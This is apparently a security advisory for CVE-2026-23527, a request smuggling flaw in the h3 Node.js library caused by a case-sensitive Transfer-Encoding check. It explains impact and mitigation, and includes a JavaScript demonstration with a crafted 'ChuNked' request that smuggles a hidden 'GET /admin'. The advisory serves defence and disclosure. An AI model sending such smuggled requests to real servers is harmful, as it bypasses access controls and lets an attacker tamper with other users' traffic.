Platform
nodejs
Component
h3
Fixed in
1.15.6
1.15.5
CVE-2026-23527 is a high-severity HTTP Request Smuggling vulnerability in h3 v1, affecting version 1.15.4. The flaw is a case-sensitive comparison of the Transfer-Encoding header value: h3 recognises only the exact lowercase token "chunked", so a request that declares its body with a differently cased value is framed without that body. The bytes left on the connection are then parsed as a second request that front-end controls never inspected, which can lead to unauthorized access to protected routes and manipulation of other clients' traffic on a shared connection. The vulnerability is resolved in version 1.15.5.
The core of this vulnerability lies in h3's handling of the Transfer-Encoding header. RFC 9112 (and RFC 7230 before it) defines transfer-coding names as case-insensitive, so "Chunked", "CHUNKED" and "chunked" all mean the same thing. h3 v1.15.4 instead performs a strict case-sensitive check and recognises only "chunked". An attacker exploits this by sending a request with a mixed-case value such as "ChuNked" together with a chunked body. Because h3 does not treat the body as chunked, it frames the request as having no body (or only the bytes covered by a Content-Length header) and dispatches it immediately. The unread body stays in the connection buffer and is parsed as the next request on that connection. When h3 sits behind a reverse proxy or load balancer that parses the header correctly and reuses back-end connections, the smuggled request can target routes the front-end would have blocked and can be processed as part of the next client's traffic on that connection. The blast radius therefore covers the h3 application itself and any service that relies on the front-end's access controls having inspected every request.
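The message-boundary desync described above, as an added example that is not h3's code: h3 v1 runs on Node's http server, and this toy HTTP/1.1 framer only models the "treat the body as empty or Content-Length-sized" behaviour the advisory attributes to 1.15.4. The vulnerable and fixed variants differ only in the predicate that decides whether the Transfer-Encoding value means chunked. The captured request, the host name `app.internal` and the paths are constructed for the example.

```javascript
// Added example (not h3's code): a minimal HTTP/1.1 request framer showing how a
// case-sensitive Transfer-Encoding check desynchronises message boundaries.
const CRLF = "\r\n";

// Split a raw request into request line, lower-cased header map and remaining bytes.
// Returns null when the head is incomplete.
function parseHead(raw) {
  const end = raw.indexOf(CRLF + CRLF);
  if (end === -1) return null;
  const lines = raw.slice(0, end).split(CRLF);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i === -1) continue;
    const name = line.slice(0, i).trim().toLowerCase(); // field names are case-insensitive
    const value = line.slice(i + 1).trim();
    headers[name] = name in headers ? `${headers[name]}, ${value}` : value;
  }
  return { requestLine: lines[0], headers, rest: raw.slice(end + 4) };
}

// Decode a chunked body. Returns { body, rest } or null if more bytes are needed.
function readChunked(data) {
  let pos = 0;
  let body = "";
  for (;;) {
    const lineEnd = data.indexOf(CRLF, pos);
    if (lineEnd === -1) return null;
    const size = parseInt(data.slice(pos, lineEnd).split(";")[0].trim(), 16);
    if (Number.isNaN(size)) throw new Error("malformed chunk-size");
    pos = lineEnd + 2;
    if (size === 0) {
      // last-chunk: skip trailer fields up to the empty line that ends the body
      for (;;) {
        const tEnd = data.indexOf(CRLF, pos);
        if (tEnd === -1) return null;
        const blank = tEnd === pos;
        pos = tEnd + 2;
        if (blank) return { body, rest: data.slice(pos) };
      }
    }
    if (data.length < pos + size + 2) return null;
    body += data.slice(pos, pos + size);
    pos += size + 2; // chunk-data plus its trailing CRLF
  }
}

// Frame one request. `isChunked` decides whether the Transfer-Encoding value
// means chunked; the vulnerable and fixed variants differ only in that predicate.
function frameRequest(raw, isChunked) {
  const head = parseHead(raw);
  if (!head) return null;
  const te = head.headers["transfer-encoding"];
  if (te !== undefined && isChunked(te)) {
    const chunked = readChunked(head.rest);
    return chunked && { requestLine: head.requestLine, body: chunked.body, rest: chunked.rest };
  }
  // Not recognised as chunked: fall back to Content-Length (empty body if absent).
  const len = parseInt(head.headers["content-length"] ?? "0", 10);
  if (head.rest.length < len) return null;
  return { requestLine: head.requestLine, body: head.rest.slice(0, len), rest: head.rest.slice(len) };
}

// Vulnerable predicate: exact match, so "ChuNked" is not treated as chunked.
const isChunkedCaseSensitive = (te) => te === "chunked";
// Fixed predicate: transfer-coding names are case-insensitive (RFC 9112, section 7).
// This toy accepts a single coding only; a real parser also handles coding lists.
const isChunkedCaseInsensitive = (te) => te.trim().toLowerCase() === "chunked";

// Parse every request in a connection buffer, as a keep-alive server would.
function splitConnection(raw, isChunked) {
  const requests = [];
  let buf = raw;
  while (buf.length > 0) {
    const req = frameRequest(buf, isChunked);
    if (!req) break; // incomplete: a real server would wait for more bytes
    requests.push(req);
    buf = req.rest;
  }
  return requests;
}

// Constructed attacker traffic (host name and paths are made up). The outer
// Content-Length: 4 covers exactly the chunk-size line, and the inner
// Content-Length: 7 absorbs the "\r\n0\r\n\r\n" that ends the chunked body, so a
// parser that ignores the chunked coding sees the body as a clean second request.
const SMUGGLED =
  "GET /admin HTTP/1.1" + CRLF + "Host: app.internal" + CRLF + "Content-Length: 7" + CRLF + CRLF;
const CAPTURE =
  "POST /upload HTTP/1.1" + CRLF +
  "Host: app.internal" + CRLF +
  "Content-Length: 4" + CRLF +
  "Transfer-Encoding: ChuNked" + CRLF + CRLF +
  SMUGGLED.length.toString(16) + CRLF + SMUGGLED + CRLF + "0" + CRLF + CRLF;

for (const [label, pred] of [["vulnerable", isChunkedCaseSensitive], ["fixed", isChunkedCaseInsensitive]]) {
  const reqs = splitConnection(CAPTURE, pred);
  console.log(`${label}: ${reqs.length} request(s)`, reqs.map((r) => r.requestLine));
}
```

With the case-sensitive predicate the buffer yields two requests, the second being `GET /admin`; with the case-insensitive predicate the whole chunked body is consumed as the first request's body and nothing is left on the connection.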
CVE-2026-23527 was published on January 15, 2026. Its CVSS severity is rated HIGH (8.9). There is no indication that it is listed in the CISA KEV catalog, and its EPSS score is 0.03% (8th percentile), so predicted exploitation activity is currently low. Public proof-of-concept (PoC) code is nonetheless likely to emerge, since the technique is a well-understood HTTP Request Smuggling variant and a single mixed-case header is all that is needed to trigger the desync. Monitor security advisories and threat intelligence feeds for reports of active exploitation campaigns targeting h3 deployments.
Exploit status
EPSS
0.03% (8th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-23527 is to upgrade to h3 version 1.15.5 or later, which makes the Transfer-Encoding check case-insensitive. If upgrading immediately is not feasible, place a Web Application Firewall (WAF) or reverse proxy in front of h3 and have it reject requests whose Transfer-Encoding value is anything other than the exact lowercase token "chunked" (mixed case, unknown codings, or lists of codings), as well as requests that carry both Transfer-Encoding and Content-Length. A proxy that decodes chunked bodies itself and forwards a fixed-length body to h3 removes the ambiguity entirely, because h3 then never sees the header. In either case the front-end must parse the header case-insensitively itself; a filter that only matches the literal string "chunked" reproduces the bug. After upgrading, send a request with a mixed-case header (e.g. "ChuNked") and a chunked body over a keep-alive connection, followed by an ordinary request on the same connection, and confirm that the first body is consumed as chunked data (or the request is rejected outright) and that the second request is handled on its own, with nothing from the first body prepended to it.
Update the h3 library to version 1.15.5 or later to mitigate the request smuggling vulnerability. This update corrects the validation of the Transfer-Encoding header, ensuring that HTTP requests are framed correctly.
It is a HIGH severity HTTP Request Smuggling vulnerability in h3 v1.15.4: a case-sensitive check of the Transfer-Encoding header lets attackers slip a second request past front-end security controls.
If you run h3 v1 at version 1.15.4, you are vulnerable. Check your deployments and upgrade immediately.
Upgrade to h3 v1.15.5 or later. As a temporary workaround, put a WAF or reverse proxy in front of h3 that filters requests with unusual Transfer-Encoding headers.
There are no confirmed reports of active exploitation at this time, but the vulnerability is easily exploitable and POC code is likely to emerge.
Refer to the official h3 project documentation and security advisories, as well as the NVD entry for CVE-2026-23527 for further details.